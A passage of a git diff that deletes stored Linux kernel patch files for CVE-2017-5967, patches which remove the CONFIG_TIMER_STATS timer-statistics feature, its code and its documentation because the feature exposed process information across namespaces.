--The statistics can be retrieved by: --# cat /proc/timer_stats -- --The readout of /proc/timer_stats automatically disables sampling. The sampled --information is kept until a new sample period is started. This allows multiple --readouts. 
-- --Sample output of /proc/timer_stats: -- --Timerstats sample period: 3.888770 s -- 12, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 15, 1 swapper hcd_submit_urb (rh_timer_func) -- 4, 959 kedac schedule_timeout (process_timeout) -- 1, 0 swapper page_writeback_init (wb_timer_fn) -- 28, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 22, 2948 IRQ 4 tty_flip_buffer_push (delayed_work_timer_fn) -- 3, 3100 bash schedule_timeout (process_timeout) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper neigh_table_init_no_netlink (neigh_periodic_timer) -- 1, 2292 ip __netdev_watchdog_up (dev_watchdog) -- 1, 23 events/1 do_cache_clean (delayed_work_timer_fn) --90 total events, 30.0 events/sec -- --The first column is the number of events, the second column the pid, the third --column is the name of the process. The forth column shows the function which --initialized the timer and in parenthesis the callback function which was --executed on expiry. -- -- Thomas, Ingo -- --Added flag to indicate 'deferrable timer' in /proc/timer_stats. 
A deferrable --timer will appear as follows -- 10D, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- -diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h -index 0302bbe..765d9e7 100644 ---- a/include/linux/hrtimer.h -+++ b/include/linux/hrtimer.h -@@ -96,12 +96,6 @@ - * @function: timer expiry callback function - * @base: pointer to the timer base (per cpu and per clock) - * @state: state information (See bit values above) -- * @start_site: timer statistics field to store the site where the timer -- * was started -- * @start_comm: timer statistics field to store the name of the process which -- * started the timer -- * @start_pid: timer statistics field to store the pid of the task which -- * started the timer - * - * The hrtimer structure must be initialized by hrtimer_init() - */ -@@ -111,11 +105,6 @@ - enum hrtimer_restart (*function)(struct hrtimer *); - struct hrtimer_clock_base *base; - unsigned long state; --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - }; - - /** -diff --git a/include/linux/timer.h b/include/linux/timer.h -index 8c5a197..7c8adfa 100644 ---- a/include/linux/timer.h -+++ b/include/linux/timer.h -@@ -23,11 +23,6 @@ - - int slack; - --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - #ifdef CONFIG_LOCKDEP - struct lockdep_map lockdep_map; - #endif -@@ -193,49 +188,6 @@ - * jiffie. 
- */ - extern unsigned long get_next_timer_interrupt(unsigned long now); -- --/* -- * Timer-statistics info: -- */ --#ifdef CONFIG_TIMER_STATS -- --extern int timer_stats_active; -- --#define TIMER_STATS_FLAG_DEFERRABLE 0x1 -- --extern void init_timer_stats(void); -- --extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, -- unsigned int timer_flag); -- --extern void __timer_stats_timer_set_start_info(struct timer_list *timer, -- void *addr); -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ -- if (likely(!timer_stats_active)) -- return; -- __timer_stats_timer_set_start_info(timer, __builtin_return_address(0)); --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ -- timer->start_site = NULL; --} --#else --static inline void init_timer_stats(void) --{ --} -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ --} --#endif - - extern void add_timer(struct timer_list *timer); - -diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c -index 47067de..c9c3a6c 100644 ---- a/kernel/hrtimer.c -+++ b/kernel/hrtimer.c -@@ -827,34 +827,6 @@ - clock_was_set_delayed(); - } - --static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (timer->start_site) -- return; -- timer->start_site = __builtin_return_address(0); -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --#endif --} -- --static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; --#endif --} -- --static inline void timer_stats_account_hrtimer(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (likely(!timer_stats_active)) -- return; -- timer_stats_update_stats(timer, timer->start_pid, 
timer->start_site, -- timer->function, timer->start_comm, 0); --#endif --} -- - /* - * Counterpart to lock_hrtimer_base above: - */ -@@ -988,7 +960,6 @@ - * rare case and less expensive than a smp call. - */ - debug_deactivate(timer); -- timer_stats_hrtimer_clear_start_info(timer); - reprogram = base->cpu_base == &__get_cpu_var(hrtimer_bases); - /* - * We must preserve the CALLBACK state flag here, -@@ -1033,8 +1004,6 @@ - - /* Switch the timer base, if necessary: */ - new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED); -- -- timer_stats_hrtimer_set_start_info(timer); - - leftmost = enqueue_hrtimer(timer, new_base); - -@@ -1211,12 +1180,6 @@ - base = hrtimer_clockid_to_base(clock_id); - timer->base = &cpu_base->clock_base[base]; - timerqueue_init(&timer->node); -- --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - } - - /** -@@ -1264,7 +1227,6 @@ - - debug_deactivate(timer); - __remove_hrtimer(timer, base, HRTIMER_STATE_CALLBACK, 0); -- timer_stats_account_hrtimer(timer); - fn = timer->function; - - /* -diff --git a/kernel/time/Makefile b/kernel/time/Makefile -index aa91af5..fd87e51 100644 ---- a/kernel/time/Makefile -+++ b/kernel/time/Makefile -@@ -7,4 +7,3 @@ - obj-$(CONFIG_GENERIC_SCHED_CLOCK) += sched_clock.o - obj-$(CONFIG_TICK_ONESHOT) += tick-oneshot.o - obj-$(CONFIG_TICK_ONESHOT) += tick-sched.o --obj-$(CONFIG_TIMER_STATS) += timer_stats.o -diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c -index 61ed862..f6a1043 100644 ---- a/kernel/time/timer_list.c -+++ b/kernel/time/timer_list.c -@@ -57,21 +57,11 @@ - print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer, - int idx, u64 now) - { --#ifdef CONFIG_TIMER_STATS -- char tmp[TASK_COMM_LEN + 1]; --#endif - SEQ_printf(m, " #%d: ", idx); - print_name_offset(m, taddr); - SEQ_printf(m, ", "); - print_name_offset(m, timer->function); - SEQ_printf(m, ", S:%02lx", 
timer->state); --#ifdef CONFIG_TIMER_STATS -- SEQ_printf(m, ", "); -- print_name_offset(m, timer->start_site); -- memcpy(tmp, timer->start_comm, TASK_COMM_LEN); -- tmp[TASK_COMM_LEN] = 0; -- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); --#endif - SEQ_printf(m, "\n"); - SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n", - (unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)), -diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c -deleted file mode 100644 -index 0b537f2..0000000 ---- a/kernel/time/timer_stats.c -+++ /dev/null -@@ -1,425 +0,0 @@ --/* -- * kernel/time/timer_stats.c -- * -- * Collect timer usage statistics. -- * -- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar -- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner -- * -- * timer_stats is based on timer_top, a similar functionality which was part of -- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the -- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based -- * on dynamic allocation of the statistics entries and linear search based -- * lookup combined with a global lock, rather than the static array, hash -- * and per-CPU locking which is used by timer_stats. It was written for the -- * pre hrtimer kernel code and therefore did not take hrtimers into account. -- * Nevertheless it provided the base for the timer_stats implementation and -- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks -- * for this effort. -- * -- * timer_top.c is -- * Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus -- * Written by Daniel Petrini -- * timer_top.c was released under the GNU General Public License version 2 -- * -- * We export the addresses and counting of timer functions being called, -- * the pid and cmdline from the owner process if applicable. 
-- * -- * Start/stop data collection: -- * # echo [1|0] >/proc/timer_stats -- * -- * Display the information collected so far: -- * # cat /proc/timer_stats -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 as -- * published by the Free Software Foundation. -- */ -- --#include --#include --#include --#include --#include --#include -- --#include -- --/* -- * This is our basic unit of interest: a timer expiry event identified -- * by the timer, its start/expire functions and the PID of the task that -- * started the timer. We count the number of times an event happens: -- */ --struct entry { -- /* -- * Hash list: -- */ -- struct entry *next; -- -- /* -- * Hash keys: -- */ -- void *timer; -- void *start_func; -- void *expire_func; -- pid_t pid; -- -- /* -- * Number of timeout events: -- */ -- unsigned long count; -- unsigned int timer_flag; -- -- /* -- * We save the command-line string to preserve -- * this information past task exit: -- */ -- char comm[TASK_COMM_LEN + 1]; -- --} ____cacheline_aligned_in_smp; -- --/* -- * Spinlock protecting the tables - not taken during lookup: -- */ --static DEFINE_RAW_SPINLOCK(table_lock); -- --/* -- * Per-CPU lookup locks for fast hash lookup: -- */ --static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock); -- --/* -- * Mutex to serialize state changes with show-stats activities: -- */ --static DEFINE_MUTEX(show_mutex); -- --/* -- * Collection status, active/inactive: -- */ --int __read_mostly timer_stats_active; -- --/* -- * Beginning/end timestamps of measurement: -- */ --static ktime_t time_start, time_stop; -- --/* -- * tstat entry structs only get allocated while collection is -- * active and never freed during that time - this simplifies -- * things quite a bit. -- * -- * They get freed when a new collection period is started. 
-- */ --#define MAX_ENTRIES_BITS 10 --#define MAX_ENTRIES (1UL << MAX_ENTRIES_BITS) -- --static unsigned long nr_entries; --static struct entry entries[MAX_ENTRIES]; -- --static atomic_t overflow_count; -- --/* -- * The entries are in a hash-table, for fast lookup: -- */ --#define TSTAT_HASH_BITS (MAX_ENTRIES_BITS - 1) --#define TSTAT_HASH_SIZE (1UL << TSTAT_HASH_BITS) --#define TSTAT_HASH_MASK (TSTAT_HASH_SIZE - 1) -- --#define __tstat_hashfn(entry) \ -- (((unsigned long)(entry)->timer ^ \ -- (unsigned long)(entry)->start_func ^ \ -- (unsigned long)(entry)->expire_func ^ \ -- (unsigned long)(entry)->pid ) & TSTAT_HASH_MASK) -- --#define tstat_hashentry(entry) (tstat_hash_table + __tstat_hashfn(entry)) -- --static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly; -- --static void reset_entries(void) --{ -- nr_entries = 0; -- memset(entries, 0, sizeof(entries)); -- memset(tstat_hash_table, 0, sizeof(tstat_hash_table)); -- atomic_set(&overflow_count, 0); --} -- --static struct entry *alloc_entry(void) --{ -- if (nr_entries >= MAX_ENTRIES) -- return NULL; -- -- return entries + nr_entries++; --} -- --static int match_entries(struct entry *entry1, struct entry *entry2) --{ -- return entry1->timer == entry2->timer && -- entry1->start_func == entry2->start_func && -- entry1->expire_func == entry2->expire_func && -- entry1->pid == entry2->pid; --} -- --/* -- * Look up whether an entry matching this item is present -- * in the hash already. 
Must be called with irqs off and the -- * lookup lock held: -- */ --static struct entry *tstat_lookup(struct entry *entry, char *comm) --{ -- struct entry **head, *curr, *prev; -- -- head = tstat_hashentry(entry); -- curr = *head; -- -- /* -- * The fastpath is when the entry is already hashed, -- * we do this with the lookup lock held, but with the -- * table lock not held: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- return curr; -- -- curr = curr->next; -- } -- /* -- * Slowpath: allocate, set up and link a new hash entry: -- */ -- prev = NULL; -- curr = *head; -- -- raw_spin_lock(&table_lock); -- /* -- * Make sure we have not raced with another CPU: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- goto out_unlock; -- -- prev = curr; -- curr = curr->next; -- } -- -- curr = alloc_entry(); -- if (curr) { -- *curr = *entry; -- curr->count = 0; -- curr->next = NULL; -- memcpy(curr->comm, comm, TASK_COMM_LEN); -- -- smp_mb(); /* Ensure that curr is initialized before insert */ -- -- if (prev) -- prev->next = curr; -- else -- *head = curr; -- } -- out_unlock: -- raw_spin_unlock(&table_lock); -- -- return curr; --} -- --/** -- * timer_stats_update_stats - Update the statistics for a timer. -- * @timer: pointer to either a timer_list or a hrtimer -- * @pid: the pid of the task which set up the timer -- * @startf: pointer to the function which did the timer setup -- * @timerf: pointer to the timer callback function of the timer -- * @comm: name of the process which set up the timer -- * -- * When the timer is already registered, then the event counter is -- * incremented. Otherwise the timer is registered in a free slot. 
-- */ --void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, -- unsigned int timer_flag) --{ -- /* -- * It doesn't matter which lock we take: -- */ -- raw_spinlock_t *lock; -- struct entry *entry, input; -- unsigned long flags; -- -- if (likely(!timer_stats_active)) -- return; -- -- lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id()); -- -- input.timer = timer; -- input.start_func = startf; -- input.expire_func = timerf; -- input.pid = pid; -- input.timer_flag = timer_flag; -- -- raw_spin_lock_irqsave(lock, flags); -- if (!timer_stats_active) -- goto out_unlock; -- -- entry = tstat_lookup(&input, comm); -- if (likely(entry)) -- entry->count++; -- else -- atomic_inc(&overflow_count); -- -- out_unlock: -- raw_spin_unlock_irqrestore(lock, flags); --} -- --static void print_name_offset(struct seq_file *m, unsigned long addr) --{ -- char symname[KSYM_NAME_LEN]; -- -- if (lookup_symbol_name(addr, symname) < 0) -- seq_printf(m, "<%p>", (void *)addr); -- else -- seq_printf(m, "%s", symname); --} -- --static int tstats_show(struct seq_file *m, void *v) --{ -- struct timespec period; -- struct entry *entry; -- unsigned long ms; -- long events = 0; -- ktime_t time; -- int i; -- -- mutex_lock(&show_mutex); -- /* -- * If still active then calculate up to now: -- */ -- if (timer_stats_active) -- time_stop = ktime_get(); -- -- time = ktime_sub(time_stop, time_start); -- -- period = ktime_to_timespec(time); -- ms = period.tv_nsec / 1000000; -- -- seq_puts(m, "Timer Stats Version: v0.2\n"); -- seq_printf(m, "Sample period: %ld.%03ld s\n", period.tv_sec, ms); -- if (atomic_read(&overflow_count)) -- seq_printf(m, "Overflow: %d entries\n", -- atomic_read(&overflow_count)); -- -- for (i = 0; i < nr_entries; i++) { -- entry = entries + i; -- if (entry->timer_flag & TIMER_STATS_FLAG_DEFERRABLE) { -- seq_printf(m, "%4luD, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } else { -- seq_printf(m, " %4lu, %5d %-16s ", -- 
entry->count, entry->pid, entry->comm); -- } -- -- print_name_offset(m, (unsigned long)entry->start_func); -- seq_puts(m, " ("); -- print_name_offset(m, (unsigned long)entry->expire_func); -- seq_puts(m, ")\n"); -- -- events += entry->count; -- } -- -- ms += period.tv_sec * 1000; -- if (!ms) -- ms = 1; -- -- if (events && period.tv_sec) -- seq_printf(m, "%ld total events, %ld.%03ld events/sec\n", -- events, events * 1000 / ms, -- (events * 1000000 / ms) % 1000); -- else -- seq_printf(m, "%ld total events\n", events); -- -- mutex_unlock(&show_mutex); -- -- return 0; --} -- --/* -- * After a state change, make sure all concurrent lookup/update -- * activities have stopped: -- */ --static void sync_access(void) --{ -- unsigned long flags; -- int cpu; -- -- for_each_online_cpu(cpu) { -- raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu); -- -- raw_spin_lock_irqsave(lock, flags); -- /* nothing */ -- raw_spin_unlock_irqrestore(lock, flags); -- } --} -- --static ssize_t tstats_write(struct file *file, const char __user *buf, -- size_t count, loff_t *offs) --{ -- char ctl[2]; -- -- if (count != 2 || *offs) -- return -EINVAL; -- -- if (copy_from_user(ctl, buf, count)) -- return -EFAULT; -- -- mutex_lock(&show_mutex); -- switch (ctl[0]) { -- case '0': -- if (timer_stats_active) { -- timer_stats_active = 0; -- time_stop = ktime_get(); -- sync_access(); -- } -- break; -- case '1': -- if (!timer_stats_active) { -- reset_entries(); -- time_start = ktime_get(); -- smp_mb(); -- timer_stats_active = 1; -- } -- break; -- default: -- count = -EINVAL; -- } -- mutex_unlock(&show_mutex); -- -- return count; --} -- --static int tstats_open(struct inode *inode, struct file *filp) --{ -- return single_open(filp, tstats_show, NULL); --} -- --static const struct file_operations tstats_fops = { -- .open = tstats_open, -- .read = seq_read, -- .write = tstats_write, -- .llseek = seq_lseek, -- .release = single_release, --}; -- --void __init init_timer_stats(void) --{ -- int cpu; -- -- 
for_each_possible_cpu(cpu) -- raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu)); --} -- --static int __init init_tstats_procfs(void) --{ -- struct proc_dir_entry *pe; -- -- pe = proc_create("timer_stats", 0644, NULL, &tstats_fops); -- if (!pe) -- return -ENOMEM; -- return 0; --} --__initcall(init_tstats_procfs); -diff --git a/kernel/timer.c b/kernel/timer.c -index 5733076..8bff0a9 100644 ---- a/kernel/timer.c -+++ b/kernel/timer.c -@@ -397,34 +397,6 @@ - } - } - --#ifdef CONFIG_TIMER_STATS --void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr) --{ -- if (timer->start_site) -- return; -- -- timer->start_site = addr; -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --} -- --static void timer_stats_account_timer(struct timer_list *timer) --{ -- unsigned int flag = 0; -- -- if (likely(!timer->start_site)) -- return; -- if (unlikely(tbase_get_deferrable(timer->base))) -- flag |= TIMER_STATS_FLAG_DEFERRABLE; -- -- timer_stats_update_stats(timer, timer->start_pid, timer->start_site, -- timer->function, timer->start_comm, flag); --} -- --#else --static void timer_stats_account_timer(struct timer_list *timer) {} --#endif -- - #ifdef CONFIG_DEBUG_OBJECTS_TIMERS - - static struct debug_obj_descr timer_debug_descr; -@@ -637,11 +609,6 @@ - timer->entry.next = NULL; - timer->base = (void *)((unsigned long)base | flags); - timer->slack = -1; --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - lockdep_init_map(&timer->lockdep_map, name, key, 0); - } - -@@ -739,7 +706,6 @@ - unsigned long flags; - int ret = 0 , cpu; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(!timer->function); - - base = lock_timer_base(timer, &flags); -@@ -943,7 +909,6 @@ - struct tvec_base *base = per_cpu(tvec_bases, cpu); - unsigned long flags; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(timer_pending(timer) || 
!timer->function); - spin_lock_irqsave(&base->lock, flags); - timer_set_base(timer, base); -@@ -981,7 +946,6 @@ - - debug_assert_init(timer); - -- timer_stats_timer_clear_start_info(timer); - if (timer_pending(timer)) { - base = lock_timer_base(timer, &flags); - ret = detach_if_pending(timer, base, true); -@@ -1009,10 +973,9 @@ - - base = lock_timer_base(timer, &flags); - -- if (base->running_timer != timer) { -- timer_stats_timer_clear_start_info(timer); -+ if (base->running_timer != timer) - ret = detach_if_pending(timer, base, true); -- } -+ - spin_unlock_irqrestore(&base->lock, flags); - - return ret; -@@ -1192,8 +1155,6 @@ - fn = timer->function; - data = timer->data; - irqsafe = tbase_get_irqsafe(timer->base); -- -- timer_stats_account_timer(timer); - - base->running_timer = timer; - detach_expired_timer(timer, base); -@@ -1695,7 +1656,6 @@ - - err = timer_cpu_notify(&timers_nb, (unsigned long)CPU_UP_PREPARE, - (void *)(long)smp_processor_id()); -- init_timer_stats(); - - BUG_ON(err != NOTIFY_OK); - -diff --git a/kernel/workqueue.c b/kernel/workqueue.c -index 2505648..562f1a5 100755 ---- a/kernel/workqueue.c -+++ b/kernel/workqueue.c -@@ -1448,8 +1448,6 @@ - return; - } - -- timer_stats_timer_set_start_info(&dwork->timer); -- - dwork->wq = wq; - dwork->cpu = cpu; - timer->expires = jiffies + delay; -diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug -index a0818f1..822e2be 100755 ---- a/lib/Kconfig.debug -+++ b/lib/Kconfig.debug -@@ -400,20 +400,6 @@ - application, you can say N to avoid the very slight overhead - this adds. - --config TIMER_STATS -- bool "Collect kernel timers statistics" -- depends on DEBUG_KERNEL && PROC_FS -- help -- If you say Y here, additional code will be inserted into the -- timer routines to collect statistics about kernel timers being -- reprogrammed. The statistics can be read from /proc/timer_stats. -- The statistics collection is started by writing 1 to /proc/timer_stats, -- writing 0 stops it. 
This feature is useful to collect information
-- about timer usage patterns in kernel and userspace. This feature
-- is lightweight if enabled in the kernel config but not activated
-- (it defaults to deactivated on bootup and will only be activated
-- if some application like powertop activates it explicitly).
--
- config DEBUG_OBJECTS
- bool "Debug object operations"
- depends on DEBUG_KERNEL
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64
deleted file mode 100644
index 1883365e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch
deleted file mode 100644
index 90b2f55c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-From 63d41fb2b101ff0bd786deab3c60114d38d47048 Mon Sep 17 00:00:00 2001
-From: Christopher R. Palmer
-Date: Sat, 29 Apr 2017 06:44:14 -0400
-Subject: [PATCH] pme: defconfig: Remove CONFIG_TIMER_STATS
-
-Change-Id: Ib4c88393eccc70e998f3a7dcc9f9a4de5230735c
----
-
-diff --git a/arch/arm64/configs/pme_defconfig b/arch/arm64/configs/pme_defconfig
-index b145bb6..6ad8818 100644
---- a/arch/arm64/configs/pme_defconfig
-+++ b/arch/arm64/configs/pme_defconfig
-@@ -4414,7 +4414,6 @@
- # CONFIG_PANIC_ON_RT_THROTTLING is not set
- # CONFIG_SCHEDSTATS is not set
- # CONFIG_SCHED_STACK_END_CHECK is not set
--CONFIG_TIMER_STATS=y
- # CONFIG_DEBUG_MODULE_SCAN_OFF is not set
- # CONFIG_DEBUG_TASK_STACK_SCAN_OFF is not set
- # CONFIG_DEBUG_PREEMPT is not set
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64
deleted file mode 100644
index 577a36e4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch b/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch
deleted file mode 100644
index b7bd1067..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/^4.9/0003.patch
+++ /dev/null
@@ -1,939 +0,0 @@
-From dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 Mon Sep 17 00:00:00 2001
-From: Kees Cook
-Date: Wed, 8 Feb 2017 11:26:59 -0800
-Subject: time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Suggested-by: Thomas Gleixner
-Signed-off-by: Kees Cook
-Acked-by: John Stultz
-Cc: Nicolas Pitre
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan
-Cc: Shuah Khan
-Cc: Xing Gao
-Cc: Jonathan Corbet
-Cc: Jessica Frazelle
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss
-Cc: "Paul E. McKenney"
-Cc: Petr Mladek
-Cc: Richard Cochran
-Cc: Tejun Heo
-Cc: Michal Marek
-Cc: Josh Poimboeuf
-Cc: Dmitry Vyukov
-Cc: Oleg Nesterov
-Cc: "Eric W. 
Biederman" -Cc: Olof Johansson -Cc: Andrew Morton -Cc: linux-api@vger.kernel.org -Cc: Arjan van de Ven -Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast -Signed-off-by: Thomas Gleixner ---- - Documentation/timers/timer_stats.txt | 73 ------ - include/linux/hrtimer.h | 11 - - include/linux/timer.h | 45 ---- - kernel/kthread.c | 1 - - kernel/time/Makefile | 1 - - kernel/time/hrtimer.c | 38 ---- - kernel/time/timer.c | 48 +--- - kernel/time/timer_list.c | 10 - - kernel/time/timer_stats.c | 425 ----------------------------------- - kernel/workqueue.c | 2 - - lib/Kconfig.debug | 14 -- - 11 files changed, 2 insertions(+), 666 deletions(-) - delete mode 100644 Documentation/timers/timer_stats.txt - delete mode 100644 kernel/time/timer_stats.c - -diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt -deleted file mode 100644 -index de835ee..0000000 ---- a/Documentation/timers/timer_stats.txt -+++ /dev/null -@@ -1,73 +0,0 @@ --timer_stats - timer usage statistics -------------------------------------- -- --timer_stats is a debugging facility to make the timer (ab)usage in a Linux --system visible to kernel and userspace developers. If enabled in the config --but not used it has almost zero runtime overhead, and a relatively small --data structure overhead. Even if collection is enabled runtime all the --locking is per-CPU and lookup is hashed. -- --timer_stats should be used by kernel and userspace developers to verify that --their code does not make unduly use of timers. This helps to avoid unnecessary --wakeups, which should be avoided to optimize power consumption. -- --It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration --section. 
-- --timer_stats collects information about the timer events which are fired in a --Linux system over a sample period: -- --- the pid of the task(process) which initialized the timer --- the name of the process which initialized the timer --- the function where the timer was initialized --- the callback function which is associated to the timer --- the number of events (callbacks) -- --timer_stats adds an entry to /proc: /proc/timer_stats -- --This entry is used to control the statistics functionality and to read out the --sampled information. -- --The timer_stats functionality is inactive on bootup. -- --To activate a sample period issue: --# echo 1 >/proc/timer_stats -- --To stop a sample period issue: --# echo 0 >/proc/timer_stats -- --The statistics can be retrieved by: --# cat /proc/timer_stats -- --While sampling is enabled, each readout from /proc/timer_stats will see --newly updated statistics. Once sampling is disabled, the sampled information --is kept until a new sample period is started. This allows multiple readouts. -- --Sample output of /proc/timer_stats: -- --Timerstats sample period: 3.888770 s -- 12, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 15, 1 swapper hcd_submit_urb (rh_timer_func) -- 4, 959 kedac schedule_timeout (process_timeout) -- 1, 0 swapper page_writeback_init (wb_timer_fn) -- 28, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 22, 2948 IRQ 4 tty_flip_buffer_push (delayed_work_timer_fn) -- 3, 3100 bash schedule_timeout (process_timeout) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper neigh_table_init_no_netlink (neigh_periodic_timer) -- 1, 2292 ip __netdev_watchdog_up (dev_watchdog) -- 1, 23 events/1 do_cache_clean (delayed_work_timer_fn) --90 total events, 30.0 events/sec -- --The first column is the number of events, the second column the pid, the third --column is the name of the process. 
The forth column shows the function which --initialized the timer and in parenthesis the callback function which was --executed on expiry. -- -- Thomas, Ingo -- --Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable --timer will appear as follows -- 10D, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- -diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h -index cdab81b..e52b427 100644 ---- a/include/linux/hrtimer.h -+++ b/include/linux/hrtimer.h -@@ -88,12 +88,6 @@ enum hrtimer_restart { - * @base: pointer to the timer base (per cpu and per clock) - * @state: state information (See bit values above) - * @is_rel: Set if the timer was armed relative -- * @start_pid: timer statistics field to store the pid of the task which -- * started the timer -- * @start_site: timer statistics field to store the site where the timer -- * was started -- * @start_comm: timer statistics field to store the name of the process which -- * started the timer - * - * The hrtimer structure must be initialized by hrtimer_init() - */ -@@ -104,11 +98,6 @@ struct hrtimer { - struct hrtimer_clock_base *base; - u8 state; - u8 is_rel; --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - }; - - /** -diff --git a/include/linux/timer.h b/include/linux/timer.h -index 51d601f..5a209b8 100644 ---- a/include/linux/timer.h -+++ b/include/linux/timer.h -@@ -20,11 +20,6 @@ struct timer_list { - unsigned long data; - u32 flags; - --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - #ifdef CONFIG_LOCKDEP - struct lockdep_map lockdep_map; - #endif -@@ -197,46 +192,6 @@ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires); - */ - #define NEXT_TIMER_MAX_DELTA ((1UL << 30) - 1) - --/* -- * Timer-statistics info: -- */ --#ifdef CONFIG_TIMER_STATS -- --extern int timer_stats_active; -- --extern void init_timer_stats(void); -- --extern void 
